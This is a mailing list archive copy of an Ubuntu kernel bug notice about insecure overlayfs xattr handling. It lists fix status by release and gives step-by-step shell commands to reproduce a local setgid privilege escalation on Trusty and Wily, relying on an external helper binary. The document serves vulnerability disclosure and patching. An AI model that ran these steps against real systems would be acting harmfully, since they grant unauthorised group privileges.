← Back to team overview

kernel-packages team mailing list archive

  1. kernel-packages team
  2. Mailing list archive
  3. Message #162226

[Bug 1534961] Re: insecure overlayfs xattrs handling in copy_up

  Thread PreviousDate PreviousThread Next 
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1534961

Title:
  insecure overlayfs xattrs handling in copy_up

Status in linux package in Ubuntu:
  Confirmed
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in linux source package in Wily:
  Fix Released
Status in linux source package in Xenial:
  Confirmed

Bug description:
  On Ubuntu Trusty but also Ubuntu Wily, following sequence allows to
  gain group privileges of arbitrary groups that created directories
  with properties to be found using "find / -perm -02020", e.g.

  /usr/local/lib/python3.4 root.staff
  /var/lib/libuuid libuuid.libuuid
  /var/local root.staff
  /var/mail root.mail

  For Ubuntu Trusty, following sequence can be used to reproduce the
  problem:

  * In user/mount namespace:

  rm -rf Mnt Test
  mkdir Mnt Test
  mount -t overlayfs -o lowerdir=/var,upperdir=Test overlayfs Mnt

  * Outside namespace

  setfacl -m d:u:[your unpriv uid]:rwx Test

  * Inside:

  chmod 02777 Mnt/mail
  umount Mnt

  * Outside:

  ~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
  Test/mail/escalate ~/ReportUidGidCwd

  For Ubuntu Wily:

  * Inside:

  mkdir Mnt Test Work
  mount -t overlayfs -o lowerdir=/var,upperdir=Test,workdir=Work overlayfs Mnt

  * Outside:

  setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work

  * Inside:

  chmod 02777 Mnt/mail
  umount Mnt

  * Outside:

  ~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
  Test/mail/escalate ~/ReportUidGidCwd

  CreateSetgidBinary  is from
  http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/

  
  See also http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPrivilegeEscalation/ (InvitedOnly/lY9yHKQj) and attached sharing policy.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1534961/+subscriptions
  Thread PreviousDate PreviousThread Next